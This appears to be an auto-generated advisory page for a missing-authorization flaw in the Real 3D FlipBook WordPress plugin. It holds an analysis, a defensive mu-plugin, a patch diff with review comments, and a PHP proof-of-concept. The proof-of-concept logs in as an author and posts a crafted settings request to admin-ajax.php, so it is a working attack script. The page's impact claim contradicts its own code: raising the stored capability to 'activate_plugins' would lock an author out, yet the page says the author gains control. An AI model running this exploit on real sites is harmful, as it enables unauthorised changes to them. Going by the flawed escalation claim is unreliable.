Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-25423: Real 3D FlipBook <= 4.19.1 – Missing Authorization (real3d-flipbook-lite)

Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 4.19.1
Patched Version 4.19.2
Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25423:
This vulnerability is a Missing Authorization flaw in the Real 3D FlipBook WordPress plugin versions up to and including 4.19.1. The plugin’s administrative settings page and AJAX handler for saving global settings lacked proper capability checks, allowing authenticated attackers with author-level permissions or higher to modify plugin-wide configuration. This represents a medium-severity privilege escalation issue.

Atomic Edge research identifies the root cause in two specific code locations. In the file real3d-flipbook-lite/includes/Real3DFlipbook.php, the add_submenu_page call at line 833 used a dynamic $capability variable derived from a user-controlled option. This variable defaulted to 'publish_posts', which authors possess. In the file real3d-flipbook-lite/includes/plugin-admin.php, the r3d_save_general_callback function at line 33 performed its capability check using the same user-controlled option via get_option('real3dflipbook_capability', 'publish_posts'). This created a circular dependency: the permission required to change the capability setting was itself read from that configurable setting, so any user who passed the default 'publish_posts' check could raise it.

Exploitation requires an authenticated attacker with at least Author-level access. The attacker sends a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to r3d_save_general. The request must include a valid nonce obtained from the plugin’s settings page and the manageFlipbooks parameter set to Administrator. This payload triggers the r3d_save_general_callback function, which updates the real3dflipbook_capability option to activate_plugins. After this change, the attacker effectively gains administrative capability over the plugin’s settings and flipbook management functions.

The patch addresses the vulnerability by implementing a fixed, strict capability requirement. The developers replaced the dynamic $capability variable with the hardcoded manage_options string in Real3DFlipbook.php line 833. They also updated the r3d_save_general_callback function in plugin-admin.php line 33, replacing the check for current_user_can($capability) with current_user_can('manage_options'). This change ensures only users with WordPress administrative privileges can access the plugin's settings page and execute the settings-saving AJAX callback, breaking the privilege escalation chain.

Successful exploitation allows an attacker to alter global plugin configuration. This includes changing the URL slug for flipbooks, which triggers rewrite rule flushes and could impact site structure. Attackers can also modify the capability mapping for other roles, potentially locking out legitimate administrators or escalating privileges for other user accounts. While the vulnerability does not grant full WordPress administrative access, it provides control over a significant plugin component and its data.
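As an added example (not code from the plugin or from Atomic Edge), a hypothetical must-use plugin a site owner could drop into wp-content/mu-plugins/ on a site that cannot yet update to 4.19.2: it guards the r3d_save_general AJAX action with the same fixed capability the patch hardcodes, pins the real3dflipbook_capability option the settings menu reads, and flags a stored 'activate_plugins' value for an administrator to review. Hook names, option names and capabilities are the ones on this page; the function name r3d_hardening_stored_capability and the mu-plugin itself are assumptions.

```php
<?php
/*
Plugin Name: Real3D FlipBook capability hardening
Description: Hypothetical mu-plugin (not part of real3d-flipbook-lite) that
             virtually patches CVE-2026-25423 until the site runs 4.19.2.
*/
if (!defined('ABSPATH')) {
    exit;
}

// 1. Guard the AJAX handler. Priority 0 runs before the plugin's own
//    r3d_save_general_callback (registered at the default priority 10), so a
//    non-administrator's request dies before update_option() is reached.
add_action('wp_ajax_r3d_save_general', function () {
    if (current_user_can('manage_options')) {
        return;
    }
    $requested = isset($_POST['manageFlipbooks'])
        ? sanitize_text_field(wp_unslash($_POST['manageFlipbooks']))
        : '(unset)';
    // Leave an audit trail: which user tried to change the mapping, and to what.
    error_log(sprintf(
        'r3d_save_general denied: user_id=%d ip=%s manageFlipbooks=%s',
        get_current_user_id(),
        isset($_SERVER['REMOTE_ADDR']) ? sanitize_text_field(wp_unslash($_SERVER['REMOTE_ADDR'])) : '-',
        $requested
    ));
    wp_die(__('You do not have permission to perform this action.'), 403);
}, 0);

// 2. Break the circular dependency at its source. The plugin reads
//    real3dflipbook_capability through get_option() when it registers the
//    settings submenu; short-circuiting that read pins the menu to
//    'manage_options' regardless of the value stored in the database.
add_filter('pre_option_real3dflipbook_capability', function () {
    return 'manage_options';
});

// 3. Look for a prior escalation. The page describes the exploit leaving the
//    stored option at 'activate_plugins'; read the options table directly
//    because the filter above hides the stored value from get_option().
function r3d_hardening_stored_capability(): string {
    global $wpdb;
    $value = $wpdb->get_var($wpdb->prepare(
        "SELECT option_value FROM {$wpdb->options} WHERE option_name = %s",
        'real3dflipbook_capability'
    ));
    return is_string($value) ? $value : 'publish_posts';
}

add_action('admin_init', function () {
    if (!current_user_can('manage_options')) {
        return;
    }
    $stored = r3d_hardening_stored_capability();
    if ($stored === 'activate_plugins') {
        // Surface it rather than silently resetting it, so an administrator can
        // check whether the change was legitimate before reverting it.
        add_action('admin_notices', function () use ($stored) {
            printf(
                '<div class="notice notice-warning"><p>%s</p></div>',
                esc_html(sprintf('real3dflipbook_capability is currently "%s"; confirm an administrator set it.', $stored))
            );
        });
    }
});
```

Step 2 also covers any other reader of the option that the diff on this page does not touch; remove the mu-plugin once 4.19.2 is installed so the plugin's own settings behave as documented.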

Differential between vulnerable and patched code

Code Diff
--- a/real3d-flipbook-lite/includes/Real3DFlipbook.php
+++ b/real3d-flipbook-lite/includes/Real3DFlipbook.php
@@ -146,8 +146,6 @@
 	{
 		global $l10n;

-		$capability = get_option('real3dflipbook_capability', 'publish_posts');
-
 		$arg = $this->products['r3d'];
 		$flipbook = $arg['key'];

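Review bot: dropping the `$capability = get_option('real3dflipbook_capability', 'publish_posts');` assignment from the constructor is only complete if no other reader of `$capability` survives in Real3DFlipbook.php; the hunk at 833 replaces the single use visible in this patch, but the change would be easier to verify with a note stating that the `real3dflipbook_capability` option is now written only by the `manageFlipbooks` branch in plugin-admin.php and no longer consulted for authorization here.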
@@ -783,9 +781,6 @@
 			'dashicons-book'
 		);

-
-
-
 		add_submenu_page(
 			'real3d_flipbook_admin',
 			esc_html__('Flipbooks', 'real3d-flipbook'),
@@ -833,7 +828,7 @@
 			'real3d_flipbook_admin',
 			esc_html__('Settings', 'real3d-flipbook'),
 			esc_html__('Settings', 'real3d-flipbook'),
-			$capability,
+			'manage_options',
 			'real3d_flipbook_settings',
 			array($this, "settings")
 		);
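Review bot: hardcoding `'manage_options'` for the Settings submenu makes it stricter than the Flipbooks submenu registered just above it in the same function; add a one-line comment saying the settings page is intentionally administrator-only while flipbook management keeps its own capability, so a later change does not "tidy" the two back to a shared variable and reopen the issue.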
--- a/real3d-flipbook-lite/includes/plugin-admin.php
+++ b/real3d-flipbook-lite/includes/plugin-admin.php
@@ -1,171 +1,169 @@
-<?php
-if (!defined('ABSPATH')) {
-	exit; // Exit if accessed directly
-}
-
-$r3d_globals_settings = get_option("real3dflipbook_global");
-
-if (!$r3d_globals_settings)
-	r3dfb_setDefaults();
-
-function r3dfb_setDefaults()
-{
-	$defaults = r3dfb_getDefaults();
-	delete_option("real3dflipbook_global");
-	add_option("real3dflipbook_global", $defaults);
-}
-
-function r3d_sanitize_array($input)
-{
-	foreach ($input as $key => $value) {
-		if (is_array($value)) {
-			$input[$key] = sanitize_my_options($value);
-		} else {
-			$input[$key] = sanitize_text_field($value);
-			$input[$key] = wp_kses_post($value);
-		}
-	}
-	return $input;
-}
-
-add_action('wp_ajax_r3d_save_general', 'r3d_save_general_callback');
-
-function r3d_save_general_callback()
-{
-
-	check_ajax_referer('r3d_nonce', 'security');
-
-	$capability = get_option('real3dflipbook_capability', 'publish_posts');
-
-	if (!current_user_can($capability)) {
-		wp_die(__('You do not have permission to perform this action.'), 403);
-	}
-
-	unset($_POST['security'], $_POST['action']);
-
-	$data = $_POST;
-
-	if (isset($data['slug']) && (get_option('real3dflipbook_global')['slug'] ?? '') != $data['slug']) {
-		update_option('r3d_flush_rewrite_rules', true);
-	}
-
-	update_option('real3dflipbook_global', $data);
-
-
-
-
-	if (isset($data['manageFlipbooks'])) {
-
-		$role = sanitize_text_field($data['manageFlipbooks']);
-
-		$capability_map = array(
-			'Administrator' => 'activate_plugins',
-			'Editor'        => 'publish_pages',
-			'Author'        => 'publish_posts',
-		);
-
-		$capability = $capability_map[$role] ?? 'publish_posts';
-
-		update_option('real3dflipbook_capability', $capability);
-	}
-
-	wp_die();
-}
-
-add_action('wp_ajax_r3d_reset_general', 'r3d_reset_general_callback');
-
-function r3d_reset_general_callback()
-{
-
-	check_ajax_referer('r3d_nonce', 'security');
-
-	r3dfb_setDefaults();
-
-	wp_die();
-}
-
-add_action('wp_ajax_r3d_save_thumbnail', 'r3dfb_save_thumbnail_callback');
-
-function r3dfb_save_thumbnail_callback()
-{
-	// Security & permission
-	check_ajax_referer('saving-real3d-flipbook', 'security');
-	if (!current_user_can('upload_files')) {
-		wp_send_json_error(['message' => esc_html__('You do not have permission to upload files.', 'real3d-flipbook')]);
-	}
-
-	// Flipbook ID check
-	$id = isset($_POST['id']) ? absint(sanitize_text_field(wp_unslash($_POST['id']))) : 0;
-	if ($id <= 0) {
-		wp_send_json_error(['message' => esc_html__('Invalid flipbook ID.', 'real3d-flipbook')]);
-	}
-
-	$book = get_option('real3dflipbook_' . $id);
-	if (!$book) {
-		wp_send_json_error(['message' => esc_html__('The specified flipbook does not exist.', 'real3d-flipbook')]);
-	}
-
-	// Upload paths
-	$upload_dir = wp_upload_dir();
-	if (!empty($upload_dir['error'])) {
-		wp_send_json_error(['message' => esc_html__('Upload directory error: ', 'real3d-flipbook') . esc_html($upload_dir['error'])]);
-	}
-
-	$book_folder = $upload_dir['basedir'] . "/real3d-flipbook/flipbook_{$id}/";
-	$book_url = $upload_dir['baseurl'] . "/real3d-flipbook/flipbook_{$id}/";
-
-	if ((!file_exists($book_folder) && !mkdir($book_folder, 0755, true)) || !is_writable($book_folder)) {
-		wp_send_json_error(['message' => esc_html(sprintf(__('Cannot write to folder: %s', 'real3d-flipbook'), $book_folder))]);
-	}
-
-	// Validate upload
-	if (empty($_FILES['file']['tmp_name'])) {
-		wp_send_json_error(['message' => esc_html__('No file uploaded.', 'real3d-flipbook')]);
-	}
-
-	// File size (2MB)
-	if ($_FILES['file']['size'] > 2 * 1024 * 1024) {
-		wp_send_json_error(['message' => esc_html__('File size exceeds the maximum limit.', 'real3d-flipbook')]);
-	}
-
-	// Extension & image check
-	$allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
-	$filename = sanitize_file_name($_FILES['file']['name']);
-	$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
-	if (!in_array($extension, $allowed_extensions)) {
-		wp_send_json_error(['message' => esc_html__('Invalid file extension.', 'real3d-flipbook')]);
-	}
-	if (getimagesize($_FILES['file']['tmp_name']) === false) {
-		wp_send_json_error(['message' => esc_html__('File is not a valid image.', 'real3d-flipbook')]);
-	}
-
-	// Unique filename
-	$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . '.' . $extension;
-	$destination = $book_folder . $hashed_filename;
-	$counter = 0;
-	while (file_exists($destination)) {
-		$counter++;
-		$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . "_{$counter}." . $extension;
-		$destination = $book_folder . $hashed_filename;
-	}
-
-	// Move file
-	if (!move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
-		wp_send_json_error(['message' => esc_html__('Failed to save the uploaded file.', 'real3d-flipbook')]);
-	}
-	$thumbnail_url = $book_url . $hashed_filename;
-
-	// Remove old thumbnail
-	if (!empty($book['lightboxThumbnailUrl'])) {
-		$old_file = str_replace($upload_dir['baseurl'], $upload_dir['basedir'], $book['lightboxThumbnailUrl']);
-		if (file_exists($old_file)) {
-			@unlink($old_file);
-		}
-	}
-
-	// Save option
-	$book['lightboxThumbnailUrl'] = esc_url($thumbnail_url);
-	update_option('real3dflipbook_' . $id, $book);
-
-	wp_send_json_success(['thumbnail_url' => $thumbnail_url]);
+<?php
+if (!defined('ABSPATH')) {
+	exit; // Exit if accessed directly
+}
+
+$r3d_globals_settings = get_option("real3dflipbook_global");
+
+if (!$r3d_globals_settings)
+	r3dfb_setDefaults();
+
+function r3dfb_setDefaults()
+{
+	$defaults = r3dfb_getDefaults();
+	delete_option("real3dflipbook_global");
+	add_option("real3dflipbook_global", $defaults);
+}
+
+function r3d_sanitize_array($input)
+{
+	foreach ($input as $key => $value) {
+		if (is_array($value)) {
+			$input[$key] = sanitize_my_options($value);
+		} else {
+			$input[$key] = sanitize_text_field($value);
+			$input[$key] = wp_kses_post($value);
+		}
+	}
+	return $input;
+}
+
+add_action('wp_ajax_r3d_save_general', 'r3d_save_general_callback');
+
+function r3d_save_general_callback()
+{
+
+	check_ajax_referer('r3d_nonce', 'security');
+
+	if (!current_user_can('manage_options')) {
+		wp_die(__('You do not have permission to perform this action.'), 403);
+	}
+
+	unset($_POST['security'], $_POST['action']);
+
+	$data = $_POST;
+
+	if (isset($data['slug']) && (get_option('real3dflipbook_global')['slug'] ?? '') != $data['slug']) {
+		update_option('r3d_flush_rewrite_rules', true);
+	}
+
+	update_option('real3dflipbook_global', $data);
+
+
+
+
+	if (isset($data['manageFlipbooks'])) {
+
+		$role = sanitize_text_field($data['manageFlipbooks']);
+
+		$capability_map = array(
+			'Administrator' => 'activate_plugins',
+			'Editor'        => 'publish_pages',
+			'Author'        => 'publish_posts',
+		);
+
+		$capability = $capability_map[$role] ?? 'publish_posts';
+
+		update_option('real3dflipbook_capability', $capability);
+	}
+
+	wp_die();
+}
+
+add_action('wp_ajax_r3d_reset_general', 'r3d_reset_general_callback');
+
+function r3d_reset_general_callback()
+{
+
+	check_ajax_referer('r3d_nonce', 'security');
+
+	r3dfb_setDefaults();
+
+	wp_die();
+}
+
+add_action('wp_ajax_r3d_save_thumbnail', 'r3dfb_save_thumbnail_callback');
+
+function r3dfb_save_thumbnail_callback()
+{
+	// Security & permission
+	check_ajax_referer('saving-real3d-flipbook', 'security');
+	if (!current_user_can('upload_files')) {
+		wp_send_json_error(['message' => esc_html__('You do not have permission to upload files.', 'real3d-flipbook')]);
+	}
+
+	// Flipbook ID check
+	$id = isset($_POST['id']) ? absint(sanitize_text_field(wp_unslash($_POST['id']))) : 0;
+	if ($id <= 0) {
+		wp_send_json_error(['message' => esc_html__('Invalid flipbook ID.', 'real3d-flipbook')]);
+	}
+
+	$book = get_option('real3dflipbook_' . $id);
+	if (!$book) {
+		wp_send_json_error(['message' => esc_html__('The specified flipbook does not exist.', 'real3d-flipbook')]);
+	}
+
+	// Upload paths
+	$upload_dir = wp_upload_dir();
+	if (!empty($upload_dir['error'])) {
+		wp_send_json_error(['message' => esc_html__('Upload directory error: ', 'real3d-flipbook') . esc_html($upload_dir['error'])]);
+	}
+
+	$book_folder = $upload_dir['basedir'] . "/real3d-flipbook/flipbook_{$id}/";
+	$book_url = $upload_dir['baseurl'] . "/real3d-flipbook/flipbook_{$id}/";
+
+	if ((!file_exists($book_folder) && !mkdir($book_folder, 0755, true)) || !is_writable($book_folder)) {
+		wp_send_json_error(['message' => esc_html(sprintf(__('Cannot write to folder: %s', 'real3d-flipbook'), $book_folder))]);
+	}
+
+	// Validate upload
+	if (empty($_FILES['file']['tmp_name'])) {
+		wp_send_json_error(['message' => esc_html__('No file uploaded.', 'real3d-flipbook')]);
+	}
+
+	// File size (2MB)
+	if ($_FILES['file']['size'] > 2 * 1024 * 1024) {
+		wp_send_json_error(['message' => esc_html__('File size exceeds the maximum limit.', 'real3d-flipbook')]);
+	}
+
+	// Extension & image check
+	$allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
+	$filename = sanitize_file_name($_FILES['file']['name']);
+	$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
+	if (!in_array($extension, $allowed_extensions)) {
+		wp_send_json_error(['message' => esc_html__('Invalid file extension.', 'real3d-flipbook')]);
+	}
+	if (getimagesize($_FILES['file']['tmp_name']) === false) {
+		wp_send_json_error(['message' => esc_html__('File is not a valid image.', 'real3d-flipbook')]);
+	}
+
+	// Unique filename
+	$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . '.' . $extension;
+	$destination = $book_folder . $hashed_filename;
+	$counter = 0;
+	while (file_exists($destination)) {
+		$counter++;
+		$hashed_filename = 'thumbnail_' . time() . '_' . wp_generate_password(4, false, false) . "_{$counter}." . $extension;
+		$destination = $book_folder . $hashed_filename;
+	}
+
+	// Move file
+	if (!move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
+		wp_send_json_error(['message' => esc_html__('Failed to save the uploaded file.', 'real3d-flipbook')]);
+	}
+	$thumbnail_url = $book_url . $hashed_filename;
+
+	// Remove old thumbnail
+	if (!empty($book['lightboxThumbnailUrl'])) {
+		$old_file = str_replace($upload_dir['baseurl'], $upload_dir['basedir'], $book['lightboxThumbnailUrl']);
+		if (file_exists($old_file)) {
+			@unlink($old_file);
+		}
+	}
+
+	// Save option
+	$book['lightboxThumbnailUrl'] = esc_url($thumbnail_url);
+	update_option('real3dflipbook_' . $id, $book);
+
+	wp_send_json_success(['thumbnail_url' => $thumbnail_url]);
 }
 No newline at end of file
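Review bot: the only functional change in this 171-line hunk is replacing the `get_option('real3dflipbook_capability', 'publish_posts')` lookup with `current_user_can('manage_options')` in r3d_save_general_callback; the rest is a whole-file delete-and-re-add (most likely a line-ending change) that hides the one-line fix from review and from blame, so the normalisation belongs in its own commit. Two further points are visible in the re-added code: r3d_reset_general_callback still runs only `check_ajax_referer('r3d_nonce', 'security');` before `r3dfb_setDefaults();` with no `current_user_can` check, and deserves the same `'manage_options'` guard; and `$data = $_POST;` is stored via `update_option('real3dflipbook_global', $data);` without passing through r3d_sanitize_array, which is defined above but never called (and itself references an undefined `sanitize_my_options`).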
--- a/real3d-flipbook-lite/real3d-flipbook-lite.php
+++ b/real3d-flipbook-lite/real3d-flipbook-lite.php
@@ -1,54 +1,54 @@
-<?php
-
-/*
-	Plugin Name: Real3D Flipbook PDF Viewer
-	Plugin URI: https://wordpress.org/plugins/real3d-flipbook-lite/
-	Description: Realistic 3D FlipBook, PDF Viewer, PDF Embedder - create realistic 3D flipbook from PDF or images.
-	Version: 4.19.1
-	Author: creativeinteractivemedia
-	Author URI: http://codecanyon.net/user/creativeinteractivemedia
-	License: GPLv2 or later
-	License URI: https://www.gnu.org/licenses/gpl-2.0.html
-	Text Domain: real3d-flipbook
-	Domain Path: /languages
-	*/
-
-if (!function_exists('r3d_fs')) {
-	// Create a helper function for easy SDK access.
-	function r3d_fs()
-	{
-		global $r3d_fs;
-
-		if (!isset($r3d_fs)) {
-			// Include Freemius SDK.
-			require_once dirname(__FILE__) . '/freemius/start.php';
-
-			$r3d_fs = fs_dynamic_init(array(
-				'id'                  => '13754',
-				'slug'                => 'real3d-flipbook-lite',
-				'type'                => 'plugin',
-				'public_key'          => 'pk_ac0809f567e096fcd1cce6f0e3af1',
-				'is_premium'          => false,
-				'has_addons'          => false,
-				'has_paid_plans'      => false,
-				'menu'                => array(
-					'slug'           => 'edit.php?post_type=r3d',
-					'account'        => false,
-					'first-path' => 'admin.php?page=real3d_flipbook_help'
-				),
-			));
-		}
-
-		return $r3d_fs;
-	}
-
-	// Init Freemius.
-	r3d_fs();
-	// Signal that SDK was initiated.
-	do_action('r3d_fs_loaded');
-}
-
-define('REAL3D_FLIPBOOK_VERSION', '4.19.1');
-define('REAL3D_FLIPBOOK_FILE', __FILE__);
-
+<?php
+
+/*
+	Plugin Name: Real3D Flipbook PDF Viewer
+	Plugin URI: https://wordpress.org/plugins/real3d-flipbook-lite/
+	Description: Realistic 3D FlipBook, PDF Viewer, PDF Embedder - create realistic 3D flipbook from PDF or images.
+	Version: 4.19.2
+	Author: creativeinteractivemedia
+	Author URI: http://codecanyon.net/user/creativeinteractivemedia
+	License: GPLv2 or later
+	License URI: https://www.gnu.org/licenses/gpl-2.0.html
+	Text Domain: real3d-flipbook
+	Domain Path: /languages
+	*/
+
+if (!function_exists('r3d_fs')) {
+	// Create a helper function for easy SDK access.
+	function r3d_fs()
+	{
+		global $r3d_fs;
+
+		if (!isset($r3d_fs)) {
+			// Include Freemius SDK.
+			require_once dirname(__FILE__) . '/freemius/start.php';
+
+			$r3d_fs = fs_dynamic_init(array(
+				'id'                  => '13754',
+				'slug'                => 'real3d-flipbook-lite',
+				'type'                => 'plugin',
+				'public_key'          => 'pk_ac0809f567e096fcd1cce6f0e3af1',
+				'is_premium'          => false,
+				'has_addons'          => false,
+				'has_paid_plans'      => false,
+				'menu'                => array(
+					'slug'           => 'edit.php?post_type=r3d',
+					'account'        => false,
+					'first-path' => 'admin.php?page=real3d_flipbook_help'
+				),
+			));
+		}
+
+		return $r3d_fs;
+	}
+
+	// Init Freemius.
+	r3d_fs();
+	// Signal that SDK was initiated.
+	do_action('r3d_fs_loaded');
+}
+
+define('REAL3D_FLIPBOOK_VERSION', '4.19.2');
+define('REAL3D_FLIPBOOK_FILE', __FILE__);
+
 include_once(plugin_dir_path(__FILE__) . '/includes/Real3DFlipbook.php');
 No newline at end of file
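Review bot: only the `Version: 4.19.2` header and the `REAL3D_FLIPBOOK_VERSION` constant change here, yet all 54 lines are deleted and re-added; as with plugin-admin.php this looks like a line-ending rewrite and should be separated from the security fix so the release diff stays a reviewable two-line change.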

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25423 - Real 3D FlipBook <= 4.19.1 - Missing Authorization

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';

// Step 1: Authenticate to WordPress and obtain cookies/nonce
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Access the plugin's settings page to extract the nonce
// The nonce is required for the AJAX request
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin.php?page=real3d_flipbook_settings',
    CURLOPT_POST => false
]);
$response = curl_exec($ch);

// Extract nonce from page (simplified - in reality would parse HTML)
// The nonce is typically in a script or hidden field with name 'security' or 'r3d_nonce'
// For this PoC, we assume the attacker has obtained the nonce value
$nonce = 'EXTRACTED_NONCE_VALUE';

// Step 3: Exploit the missing authorization to escalate plugin capabilities
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'r3d_save_general',
        'security' => $nonce,
        'manageFlipbooks' => 'Administrator'
        // Additional global settings parameters can be included here
    ])
]);
$ajax_response = curl_exec($ch);

// r3d_save_general_callback ends with wp_die(), so an empty body (or the
// admin-ajax.php default "0") indicates the handler ran through to completion
if ($ajax_response === '0' || $ajax_response === '') {
    echo "Exploit successful. Plugin capability changed to 'activate_plugins'.\n";
    echo "Author-level user now has administrative control over Real 3D FlipBook settings.\n";
} else {
    echo "Exploit failed. Response: " . htmlspecialchars($ajax_response) . "\n";
}

curl_close($ch);
?>
